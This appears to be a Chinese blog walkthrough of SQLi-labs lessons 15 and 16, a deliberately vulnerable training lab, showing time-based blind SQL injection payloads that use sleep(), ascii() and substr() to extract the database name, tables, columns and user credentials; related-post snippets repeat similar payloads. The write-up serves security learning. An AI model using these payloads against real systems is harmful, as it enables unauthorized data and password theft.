SQLI-labs-第十五关和第十六关

最新推荐文章于 2024-06-13 21:12:59 发布
最新推荐文章于 2024-06-13 21:12:59 发布
阅读量773 收藏 14
点赞数 30
分类专栏: 渗透学习之路 文章标签: 数据库 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54055099/article/details/138489639
版权

目录

知识点:

第十五关

1、判断注入点

2、判断当前数据库

3、判断表名

4、判断字段名

5、爆值

第十六关

1、判断注入点

知识点:

POST方式的时间盲注

对应的函数利用,可参考SQLI-labs-第九关和第十关_sqllab第十关-CSDN博客

第十五关

原理:

1、判断注入点

输入正常的数据,没有任何回显

加入单引号、双引号、括号等,都没有任何回显信息,这里可以判断为时间盲注

输入  admin' and if(length(database())>1,sleep(5),1)#

会延时5秒钟

说明当前是单引号闭合错误

这里有一个问题,使用字符就可以显示出结果,数字就不行,这个没搞懂,麻烦大神指点一下

admin' and if(length(database())>1,sleep(5),1)#    可以延时5秒

1' and if(length(database())>1,sleep(5),1)#      不会延时

2、判断当前数据库

使用函数if(),length()、sleep()、substr()、ascii()

admin' and if(length(database())=8,sleep(5),1)#

说明当前数据库长度为8位

接下来判断数据库的字符,从a开始尝试

admin' and if(ascii(substr(database(),1,1))=97,sleep(5),1)#

结果没有延时

尝试到s的时候出现了延时,说明数据库名第一个字符为s

admin' and if(ascii(substr(database(),1,1))=115,sleep(5),1)#

以此类推,通过修改substr()函数的值,可以得到当前数据库名为security

3、判断表名

还是一样,判断第一个表名的一个个字符,从a开始判断

admin' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=97,sleep(5),1)#

admin' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101,sleep(5),1)#

以此类推,通过修改limit和substr的值,可以判断出4个表为  emails 、referers、uagents、users

4、判断字段名

以users表为例

admin' and if(ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))=105,sleep(5),1)#

以此类推,可以推断出三个字段为:id、username、password

5、爆值

admin' and if(ascii(substr((select username from security.users limit 0,1),1,1))=68,sleep(5),1)#

admin' and if(ascii(substr((select password from security.users limit 0,1),1,1))=68,sleep(5),1)#

以此类推,可以得到数据库的数据

第十六关

原理:

1、判断注入点

因为输入任何信息都没有回显,所以只能采用时间盲注的方式来进行判断,在输入的值后面分别尝试加入’ " ) 等进行尝试

admin") and if(length(database())>1,sleep(5),1) #

接下来的步骤就跟上面的一致,使用ascii、substr函数等进行注入

这篇文章就写到这里了,有哪里不足,欢迎批评指正!

賺钱娶甜甜
关注
  • 30
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入:sqli-labs靶场通关(1-37
qq_68163788的博客
02-03 3997
sqli-labs是一个用于学习和练习SQL注入的开源项目。它提供了一系列的实验室环境,让用户能够在不同的SQL注入场景中进行练习和测试。这些场景包括基本的SQL注入、盲注、联合查询注入等等。 sqli-labs还提供了详细的说明和解释,帮助用户理解SQL注入的原理和技术。通过这些实验和学习,用户可以更好地了解SQL注入的危害,并学会如何防范和阻止SQL注入攻击
sqli-labs15(基于post提交的单引号布尔盲注)通关思路
zyh1588的博客
11-11 715
小白回顾sql靶场15
sqli-labs-master第1516
m_ing
05-13 2113
前言:在第九我们已经了解过GET方式的盲注,我们今天一起探讨下POST方式的盲注。 第15 http://192.168.89.134/sqli-labs-master/Less-15/ 我们在尝试了,联合查询和报错注入方式后无果,我们初步判断为盲注 我们看下源代码: 猜想正确 我们采用延迟盲注(时间注入主要用 if(表达式1,表达式2,表达式3) 函数与sleep() 函数配合使用。if函数原理是当表达式1为True时,返回值为表达式二,否则返回表达式三。) admin’ and if(lengt
sqli-labs第16
hcja666的博客
02-18 214
随便写写。
SQL-labs的第16——布尔盲注
qq_73393033的博客
07-19 171
接下来我么只需要改变substr函数的第二个参数,将它改成2,3,4(获得数据库名的第2,3,4个字母),然后通过该语句我么可以获得完整的数据库名。这说明users这数据表的第一列的列名的第一个字母是u,我们可以通过该方法或完整的列名以及其他的列名。中的0,来看其他表名的长度,将0改成1,2,3就可以看到第2,3,4数据表名的长度。中的第二个1将它换成2,3,4,就可以确定数据表名的第2,3,4个字母是什么了。这说明users这个数据表中的username列的第一个数据的长度为4。说明该网站的闭合方式为。
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
jeakinscheung-sqli-labs-php7-master.zip
03-16
sqli创建数据库连接发现连接不了,这种原因是现在大部分人用的php7,原版的sqli只支持php5.
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
422926799#note#sqli-labs第三十六1
07-25
sqli-labs Less 36代码如下:Less-36 Bypass MySQL Real Escape String//logging the conn
SQLi LABS Less 16 布尔盲注
热门推荐
wangyuxiang946的博客
08-14 1万+
SQLi 第十六SQLi-LABS Less-16SQLi-LABS Less 16SQLiLABS Less16SQLi Less 16
sqli-labs 16~20
eleven_77_的博客
11-19 146
Less-16 POST - Blind- Boolian/Time Based - Double quotes (基于bool型/时间延迟的双引号POST型盲注) 尝试输入 Dumb”) or 1=1 # 然后构造带有括号的注入 回显成功,但没有返回信息,这便与15题的做法相同,仅需要将’改成")即可 判断数据库长度payload: admin") and If(length(database())=8,1,sleep(5))# Less-17 POST - Update Query- Error B
sqli-labs靶场第十六
gou1791241251的博客
12-27 728
第十六:闭合方式为")。其余获取信息操作与其他卡一致
sqli-labs练习(十五、十六)
wkend的博客
07-27 1450
sqli-labs练习(十五)— POST-Bind-Boolean/time Based-Single quotes 同样,使用万能密码即可登录成功,进过几次注入尝试发现是基于布尔型的盲注。 万能密码:123' or 1=1#,即可登录成功。 基于布尔型的sql注入稍微麻烦,因为要不断的测试,根据页面的反应来猜测后台数据库信息。 下面直接放payload:uname=1' or (s...
Sqlilabs-16
KAKA的博客
07-07 448
相较于第 15 ,单引号变成了双引号 + 括号 –查列 uname=admin") and if(ascii(substr((select group_concat(table_name) from information_schema.tables limit 0,1),1,1))>10,sleep(5),1)#&passwd=111&submit=submit –查用户名 uname=admin") and if(ascii(substr((select group_conca
sqli-labs (less15-less16)
Xi4or0uji
07-31 1023
less 15 post方法单引号时间盲注 这跟之前的get方法的盲注差不多,具体就不多解释了,因为后台的查询语句是select xxx from "table_name" where uname='$_POST["uname"]' and passwd='$_POST["passwd"]' 所以只要构造uname=admin'绕过就行了 贴个爆数据库的脚本,其他的改下sql语句就能用了...
sqli-labs(16
jimggg的博客
03-20 191
Less-16 POST - Blind- Boolian/Time Based - Double quotes (基于bool型/时间延迟的双引号POST型盲注) ") and if(ascii(substr((select database()) ,1,1))>116,1,sleep(5))#
【Qt实现录频】
最新发布
m0_45463480的博客
06-13 47
请注意,这只是一个简单的示例代码,实际应用中你可能需要处理更多的细节,如捕获不同视频格式、处理录制过程中的错误等。希望这个示例对你有所帮助,另外你也可以在Qt官方文档中找到更多于Qt Multimedia模块的详细信息。在Qt中实现录制视频可以通过使用Qt Multimedia模块来实现。在上面的示例中,VideoRecorder类提供了一个简单的界面,其中包括一个用于录制视频的按钮。当按钮被点击时,toggleRecord()槽函数将会启动或停止录制。
sqli-labs第十五
09-02
- *1* [sqli-labs第十五](https://blog.csdn.net/yuqnqi/article/details/130575295)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值